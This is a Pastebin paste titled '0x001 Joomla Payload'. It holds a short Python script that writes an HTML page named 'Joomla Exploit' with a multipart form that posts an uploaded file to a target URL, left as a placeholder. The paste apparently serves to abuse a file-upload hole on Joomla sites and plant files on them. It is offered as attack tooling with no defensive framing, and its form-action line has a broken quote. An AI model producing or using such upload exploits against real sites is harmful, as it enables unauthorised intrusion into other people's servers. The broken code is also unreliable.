Advertisement
deathslayer999

0x001 Joomla Payload

Aug 6th, 2019
458
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.91 KB | None | 0 0
  1. sachin = "payload/index.html"
  2. if os.path.exists(sachin):
  3. os.remove(sachin)
  4.  
  5. expl = open("payload/index.html" , "w")
  6. expl.write("<html><head> \n")
  7. expl.write("<title>Joomla Exploit</title> \n")
  8. expl.write('</head><body background=""> \n')
  9. expl.write('<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Amaranth"> \n')
  10. expl.write('<style> \n')
  11. expl.write(' body { \n')
  12. expl.write(' font-family:Amaranth; \n ')
  13. expl.write(' } \n')
  14. expl.write('</style> \n')
  15. expl.write('<center><br><br><br><br><br><br><br><br><br><br> \n')
  16. expl.write('<h1 style="color:green;">Joomla Exploit</h1> \n')
  17. expl.write('<form method="POST" action="' UrL goes here" enctype="multipart/form-data"> \n')
  18. expl.write('<input type="file" name="file"><button>Exploit</button> \n')
  19. expl.write('</form> \n')
  20. expl.write('</<center></body></html> \n')
  21. expl.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement